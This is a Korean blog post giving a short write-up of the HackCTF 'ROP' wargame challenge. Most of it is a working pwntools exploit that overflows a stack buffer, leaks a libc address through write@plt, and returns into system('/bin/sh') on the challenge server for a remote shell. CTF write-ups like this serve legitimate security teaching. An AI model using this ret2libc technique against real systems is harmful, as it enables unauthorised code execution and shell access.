[HackCTF] ROP (300) write-up

Notice

Recent Posts

Recent Comments

Link

이충호님 블로그

« 2025/05 »
일	월	화	수	목	금	토
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31

Tags more

Archives

Today

Total

관리 메뉴

메로나

[HackCTF] ROP (300) write-up 본문

Wargame & CTF/Pwnable

[HackCTF] ROP (300) write-up

m3r0n4 2020. 12. 24. 02:28

걍 x86 ROP임 슥삭 하면됨

1. Exploit

from pwn import *

p = remote('ctf.j0n9hyun.xyz', 3021)
#p = process('./rop')
e = ELF('./rop')
#libc = e.libc
libc = ELF('libc.so.6')

write_plt = e.plt['write']
write_got = e.got['write']
pppr = 0x08048509

payload = "A" * (0x88 + 4)
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)
payload += p32(e.symbols['main'])

p.sendline(payload)

write_addr = u32(p.recv(4))
log.success(hex(write_addr))
libc_base = write_addr - libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()

payload = "A" * (0x88 + 4)
payload += p32(system_addr)
payload += "AAAA"
payload += p32(binsh)

p.sendline(payload)

p.interactive()

libc가 그냥 주어져 있길래 write 함수로 libc 주소 leak 해서 그걸로 system 함수랑 binsh 주소 찾아서 그걸로 RTL 하면 됨

'Wargame & CTF > Pwnable' 카테고리의 다른 글

[HackCTF] SysROP (350) write-up (0)	2020.12.24
[HackCTF] Unexploitable #1 (300) write-up (0)	2020.12.24
[HackCTF] Pwning (300) write-up (0)	2020.12.22
[HackCTF] Gift (250) write-up (0)	2020.12.22
[HackCTF] Look at me (350) write-up (0)	2020.12.19

'Wargame & CTF/Pwnable' Related Articles

메로나

[HackCTF] ROP (300) write-up 본문

[HackCTF] ROP (300) write-up

1. Exploit

'Wargame & CTF > Pwnable' 카테고리의 다른 글

티스토리툴바